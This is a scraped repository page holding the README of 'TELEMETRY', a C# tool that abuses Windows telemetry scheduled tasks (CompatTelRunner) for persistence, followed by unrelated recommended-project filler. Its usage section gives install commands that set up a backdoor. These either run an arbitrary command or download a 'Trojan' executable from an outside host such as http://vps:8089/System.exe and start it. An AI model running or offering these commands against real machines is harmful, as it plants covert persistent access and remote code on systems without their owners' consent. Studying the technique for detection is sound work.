telemetry's Introduction

TELEMETRY

Background

TELEMETRY is a C# For Windows PERSISTENCE

Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade.

Local admin rights to install (requires the ability to write to HKLM)
Have CompatTelRunner.exe
2008R2/Windows 7 through 2019/Windows 10

Advantage

Using the system's own Telemetry planned tasks
Only registry suspicious backdoor troubleshooting

Command Line Usage

    ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
                                             .Imanfeng
    Features:
        Install:   -   Deployment authority maintains backdoor

    Command:
        TELEMETRY.exe install /command:calc
        -   Execute command without file backdoor

        TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe
        -   Remotely download Trojan files to the specified directory for backdoor startup

        TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe
        -   Remotely download Trojan files to C:\\Windows\\Temp\\compattelrun.exe for backdoor startup

        TELEMETRY.exe install /path:C:\Windows\Temp\check.exe
        -   Set path Trojan files for backdoor startup

    Parameter:
        /command: -   Execute Command
        /url:     -   Download FROM
        /path:    -   Download To

Execute command without file backdoor
```
Telemetry.exe install /command:calc
```

Remotely download Trojan files for backdoor startup

Telemetry.exe install /url:http://vps:8089/System.exe

Learn

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.

Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

TensorFlow

An Open Source Machine Learning Framework for Everyone

Django

The Web framework for perfectionists with deadlines.

Laravel

A PHP framework for web artisans

D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

web

Some thing interesting about web. New door for the world.

server

A server is a program made to process requests and deliver data to clients.

Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

Visualization

Some thing interesting about visualization, use data art

Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.

Microsoft

Open source projects and samples from Microsoft.

Google

Google ❤️ Open Source for everyone.

Alibaba

Alibaba Open Source for everyone

D3

Data-Driven Documents codes.

Tencent

China tencent open source team.

5l1v3r1 / telemetry Goto Github PK